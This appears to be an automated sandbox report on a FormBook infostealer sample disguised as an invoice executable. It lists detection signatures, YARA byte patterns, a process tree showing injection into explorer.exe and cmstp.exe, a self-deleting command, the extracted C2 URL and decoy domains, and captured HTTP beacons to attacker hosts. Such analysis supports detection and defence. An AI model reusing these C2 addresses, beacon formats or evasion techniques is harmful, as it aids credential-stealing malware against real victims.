Loading ...

Play interactive tourEdit tour

Windows Analysis Report EXPORT INVOICE 2021.exe

Overview

General Information

Sample Name:EXPORT INVOICE 2021.exe
Analysis ID:502233
MD5:54bb8fbbfe0a665ca59579a0240ce2f0
SHA1:0b97e4463c76df4541179880902bb6966ef3f894
SHA256:3bd841c6957e9fdb7e9d4558fb417dca9d7317d087cdbbb270155d9a6698e657
Tags:exexloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • EXPORT INVOICE 2021.exe (PID: 7128 cmdline: 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
    • EXPORT INVOICE 2021.exe (PID: 5548 cmdline: {path} MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5860 cmdline: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        2.2.EXPORT INVOICE 2021.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.EXPORT INVOICE 2021.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: CMSTP Execution Process CreationShow sources
          Source: Process startedAuthor: Nik Seetharaman: Data: Command: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 1688, ProcessCommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', ProcessId: 5860

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: EXPORT INVOICE 2021.exeVirustotal: Detection: 32%Perma Link
          Source: EXPORT INVOICE 2021.exeMetadefender: Detection: 17%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: EXPORT INVOICE 2021.exeJoe Sandbox ML: detected
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: EXPORT INVOICE 2021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: EXPORT INVOICE 2021.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmstp.pdbGCTL source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
          Source: Binary string: cmstp.pdb source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.kalitelihavaperdesi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 51.161.86.13 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.165 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ratqueen.art
          Source: C:\Windows\explorer.exeDomain query: www.piedmontpines.school
          Source: C:\Windows\explorer.exeDomain query: www.yuezhong66.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.vulcanopresale.icu/mqi9/
          Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
          Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
          Source: global trafficHTTP traffic detected: GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1Host: www.ratqueen.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1Host: www.piedmontpines.schoolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: EXPORT INVOICE 2021.exe, 00000000.00000003.677421719.000000000155D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: unknownDNS traffic detected: queries for: www.ratqueen.art
          Source: global trafficHTTP traffic detected: GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1Host: www.ratqueen.artConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1Host: www.piedmontpines.schoolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: EXPORT INVOICE 2021.exe
          Source: EXPORT INVOICE 2021.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041B8C62_2_0041B8C6
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041C12C2_2_0041C12C
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041CBC52_2_0041CBC5
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeCode function: 2_2_0041BBDF2_2_0041BBDF
